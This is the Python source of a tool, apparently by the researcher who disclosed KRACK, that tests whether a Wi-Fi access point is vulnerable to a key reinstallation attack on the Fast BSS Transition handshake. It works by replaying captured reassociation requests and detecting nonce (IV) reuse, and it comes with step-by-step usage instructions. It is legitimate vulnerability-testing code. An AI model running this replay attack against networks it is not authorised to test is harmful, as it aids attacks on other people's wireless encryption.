krack-ft-test.py 10 KB

123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125126127128129130131132133134135136137138139140141142143144145146147148149150151152153154155156157158159160161162163164165166167168169170171172173174175176177178179180181182183184185186187188189190191192193194195196197198199200201202203204205206207208209210211212213214215216217218219220221222223224225226227228229230231232233234235236237238239240241242243244245246247248249250251252253254255256257258259260261262263264265266267268269270271272273
  1. #!/usr/bin/env python2
  2. # Copyright (c) 2017, Mathy Vanhoef <Mathy.Vanhoef@cs.kuleuven.be>
  3. #
  4. # This code may be distributed under the terms of the BSD license.
  5. # See LICENSE for more details.
  6. import logging
  7. logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
  8. from scapy.all import *
  9. from libwifi import *
  10. import sys, socket, struct, time, subprocess, atexit, select
  11. from datetime import datetime
  12. IEEE_TLV_TYPE_RSN = 48
  13. IEEE_TLV_TYPE_FT = 55
  14. IEEE80211_RADIOTAP_RATE = (1 << 2)
  15. IEEE80211_RADIOTAP_CHANNEL = (1 << 3)
  16. IEEE80211_RADIOTAP_TX_FLAGS = (1 << 15)
  17. IEEE80211_RADIOTAP_DATA_RETRIES = (1 << 17)
  18. #TODO: - !!! Detect retransmissions based on packet time and sequence counter (see client tests) !!!
  19. #TODO: - Merge code with client tests to avoid code duplication (including some error handling)
  20. #TODO: - Detect new EAPOL handshake or normal association frames (reset state and stop replaying)
  21. #TODO: - Option to use a secondary interface for injection + WARNING if a virtual interface is used + repeat advice to disable hardware encryption
  22. #TODO: - Test whether injection works on the virtual interface (send probe requests to nearby AP and wait for replies)
  23. #TODO: - Execute rfkill unblock wifi because some will forget this
  24. # FIXME: We are repeating the "disable hw encryption" script to client tests
  25. USAGE = """{name} - Tool to test Key Reinstallation Attacks against an AP
  26. To test wheter an AP is vulnerable to a Key Reinstallation Attack against
  27. the Fast BSS Transition (FT) handshake, take the following steps:
  28. 1. The hardware encryption engine of some Wi-Fi NICs have bugs that interfere
  29. with our script. So disable hardware encryption by executing:
  30. ./disable-hwcrypto.sh
  31. This only needs to be done once. It's recommended to reboot after executing
  32. this script. After plugging in your Wi-Fi NIC, use `systool -vm ath9k_htc`
  33. or similar to confirm the nohwcript/.. param has been set. We tested this
  34. with an a TP-Link TL-WN722N and an Alfa AWUS051NH v2.
  35. 2. Create a wpa_supplicant configuration file that can be used to connect
  36. to the network. A basic example is:
  37. ctrl_interface=/var/run/wpa_supplicant
  38. network={{
  39. ssid="testnet"
  40. key_mgmt=FT-PSK
  41. psk="password"
  42. }}
  43. Note the use of "FT-PSK". Save it as network.conf or similar. For more
  44. info see https://w1.fi/cgit/hostap/plain/wpa_supplicant/wpa_supplicant.conf
  45. 3. Try to connect to the network using your platform's wpa_supplicant.
  46. This will likely require a command such as:
  47. sudo wpa_supplicant -D nl80211 -i wlan0 -c network.conf
  48. If this fails, either the AP does not support FT, or you provided the wrong
  49. network configuration options in step 1.
  50. 4. Use this script as a wrapper over the previous wpa_supplicant command:
  51. sudo {name} wpa_supplicant -D nl80211 -i wlan0 -c network.conf
  52. This will execute the wpa_supplicant command using the provided parameters,
  53. and will add a virtual monitor interface that will perform attack tests.
  54. 5. Use wpa_cli to roam to a different AP of the same network. For example:
  55. sudo wpa_cli -i wlan0
  56. > status
  57. bssid=c4:e9:84:db:fb:7b
  58. ssid=testnet
  59. ...
  60. > scan_results
  61. bssid / frequency / signal level / flags / ssid
  62. c4:e9:84:db:fb:7b 2412 -21 [WPA2-PSK+FT/PSK-CCMP][ESS] testnet
  63. c4:e9:84:1d:a5:bc 2412 -31 [WPA2-PSK+FT/PSK-CCMP][ESS] testnet
  64. ...
  65. > roam c4:e9:84:1d:a5:bc
  66. ...
  67. In this example we were connected to AP c4:e9:84:db:fb:7b of testnet (see
  68. status command). The scan_results command shows this network also has a
  69. second AP with MAC c4:e9:84:1d:a5:bc. We then roam to this second AP.
  70. 6. Generate traffic between the AP and client. For example:
  71. sudo arping -I wlan0 192.168.1.10
  72. 7. Now look at the output of {name} to see if the AP is vulnerable.
  73. 6a. First it should say "Detected FT reassociation frame". Then it will
  74. start replaying this frame to try the attack.
  75. 6b. The script shows which IVs (= packet numbers) the AP is using when
  76. sending data frames.
  77. 6c. Message "IV reuse detected (IV=X, seq=Y). AP is vulnerable!" means
  78. we confirmed it's vulnerable.
  79. !! Be sure to manually check network traces as well, to confirm this script
  80. !! is replaying the reassociation request properly, and to manually confirm
  81. !! whether there is IV (= packet number) reuse or not.
  82. Example output of vulnerable AP:
  83. [15:59:24] Replaying Reassociation Request
  84. [15:59:25] AP transmitted data using IV=1 (seq=0)
  85. [15:59:25] Replaying Reassociation Request
  86. [15:59:26] AP transmitted data using IV=1 (seq=0)
  87. [15:59:26] IV reuse detected (IV=1, seq=0). AP is vulnerable!
  88. Example output of patched AP (note that IVs are never reused):
  89. [16:00:49] Replaying Reassociation Request
  90. [16:00:49] AP transmitted data using IV=1 (seq=0)
  91. [16:00:50] AP transmitted data using IV=2 (seq=1)
  92. [16:00:50] Replaying Reassociation Request
  93. [16:00:51] AP transmitted data using IV=3 (seq=2)
  94. [16:00:51] Replaying Reassociation Request
  95. [16:00:52] AP transmitted data using IV=4 (seq=3)
  96. """
  97. #### Basic output and logging functionality ####
  98. ALL, DEBUG, INFO, STATUS, WARNING, ERROR = range(6)
  99. COLORCODES = { "gray" : "\033[0;37m",
  100. "green" : "\033[0;32m",
  101. "orange": "\033[0;33m",
  102. "red" : "\033[0;31m" }
  103. global_log_level = INFO
  104. def log(level, msg, color=None, showtime=True):
  105. if level < global_log_level: return
  106. if level == DEBUG and color is None: color="gray"
  107. if level == WARNING and color is None: color="orange"
  108. if level == ERROR and color is None: color="red"
  109. print (datetime.now().strftime('[%H:%M:%S] ') if showtime else " "*11) + COLORCODES.get(color, "") + msg + "\033[1;0m"
  110. #### Man-in-the-middle Code ####
  111. class KRAckAttackFt():
  112. def __init__(self, interface):
  113. self.nic_iface = interface
  114. self.nic_mon = interface + "mon"
  115. self.clientmac = scapy.arch.get_if_hwaddr(interface)
  116. self.sock = None
  117. self.wpasupp = None
  118. self.reassoc = None
  119. self.ivs = set()
  120. self.next_replay = None
  121. def handle_rx(self):
  122. p = self.sock.recv()
  123. if p == None: return
  124. # Detect whether hardware encryption is decrypting the frame, *and* removing the TKIP/CCMP
  125. # header of the (now decrypted) frame.
  126. # FIXME: Put this check in MitmSocket? We want to check this in client tests as well!
  127. if self.clientmac in [p.addr1, p.addr2] and Dot11WEP in p:
  128. # If the hardware adds/removes the TKIP/CCMP header, this is where the plaintext starts
  129. payload = str(p[Dot11WEP])
  130. # Check if it's indeed a common LCC/SNAP plaintext header of encrypted frames, and
  131. # *not* the header of a plaintext EAPOL handshake frame
  132. if payload.startswith("\xAA\xAA\x03\x00\x00\x00") and not payload.startswith("\xAA\xAA\x03\x00\x00\x00\x88\x8e"):
  133. log(ERROR, "ERROR: Virtual monitor interface doesn't seem to pass 802.11 encryption header to userland.")
  134. log(ERROR, " Try to disable hardware encryption, or use a 2nd interface for injection.", showtime=False)
  135. quit(1)
  136. if p.addr2 == self.clientmac and Dot11ReassoReq in p:
  137. if get_tlv_value(p, IEEE_TLV_TYPE_RSN) and get_tlv_value(p, IEEE_TLV_TYPE_FT):
  138. log(INFO, "Detected FT reassociation frame")
  139. self.reassoc = p
  140. self.next_replay = time.time() + 1
  141. else:
  142. log(INFO, "Reassociation frame does not appear to be an FT one")
  143. self.reassoc = None
  144. self.ivs = set()
  145. elif p.addr2 == self.clientmac and Dot11AssoReq in p:
  146. log(INFO, "Detected normal association frame")
  147. self.reassoc = None
  148. self.ivs = set()
  149. elif p.addr1 == self.clientmac and Dot11WEP in p:
  150. iv = dot11_get_iv(p)
  151. log(INFO, "AP transmitted data using IV=%d (seq=%d)" % (iv, dot11_get_seqnum(p)))
  152. # FIXME: When the client disconnects (or reconnects), clear the set of used IVs
  153. if iv in self.ivs:
  154. log(INFO, ("IV reuse detected (IV=%d, seq=%d). " +
  155. "AP is vulnerable!") % (iv, dot11_get_seqnum(p)), color="green")
  156. self.ivs.add(iv)
  157. def configure_interfaces(self):
  158. log(STATUS, "Note: disable Wi-Fi in your network manager so it doesn't interfere with this script")
  159. # 1. Remove unused virtual interfaces to start from a clean state
  160. subprocess.call(["iw", self.nic_mon, "del"], stdout=subprocess.PIPE, stdin=subprocess.PIPE)
  161. # 2. Configure monitor mode on interfaces
  162. subprocess.check_output(["iw", self.nic_iface, "interface", "add", self.nic_mon, "type", "monitor"])
  163. # Some kernels (Debian jessie - 3.16.0-4-amd64) don't properly add the monitor interface. The following ugly
  164. # sequence of commands assures the virtual interface is properly registered as a 802.11 monitor interface.
  165. subprocess.check_output(["iw", self.nic_mon, "set", "type", "monitor"])
  166. time.sleep(0.5)
  167. subprocess.check_output(["iw", self.nic_mon, "set", "type", "monitor"])
  168. subprocess.check_output(["ifconfig", self.nic_mon, "up"])
  169. def run(self):
  170. self.configure_interfaces()
  171. self.sock = MitmSocket(type=ETH_P_ALL, iface=self.nic_mon)
  172. # Open the wpa_supplicant client that will connect to the network that will be tested
  173. self.wpasupp = subprocess.Popen(sys.argv[1:])
  174. # Monitor the virtual monitor interface of the client and perform the needed actions
  175. while True:
  176. sel = select.select([self.sock], [], [], 1)
  177. if self.sock in sel[0]: self.handle_rx()
  178. if self.reassoc and time.time() > self.next_replay:
  179. log(INFO, "Replaying Reassociation Request")
  180. self.sock.send(self.reassoc)
  181. self.next_replay = time.time() + 1
  182. def stop(self):
  183. log(STATUS, "Closing wpa_supplicant and cleaning up ...")
  184. if self.wpasupp:
  185. self.wpasupp.terminate()
  186. self.wpasupp.wait()
  187. if self.sock: self.sock.close()
  188. def cleanup():
  189. attack.stop()
  190. def argv_get_interface():
  191. for i in range(len(sys.argv)):
  192. if not sys.argv[i].startswith("-i"):
  193. continue
  194. if len(sys.argv[i]) > 2:
  195. return sys.argv[i][2:]
  196. else:
  197. return sys.argv[i + 1]
  198. return None
  199. if __name__ == "__main__":
  200. if len(sys.argv) <= 1 or "--help" in sys.argv or "-h" in sys.argv:
  201. print USAGE.format(name=sys.argv[0])
  202. quit(1)
  203. # TODO: Verify that we only accept CCMP?
  204. interface = argv_get_interface()
  205. if not interface:
  206. log(ERROR, "Failed to determine wireless interface. Specify one using the -i parameter.")
  207. quit(1)
  208. attack = KRAckAttackFt(interface)
  209. atexit.register(cleanup)
  210. attack.run()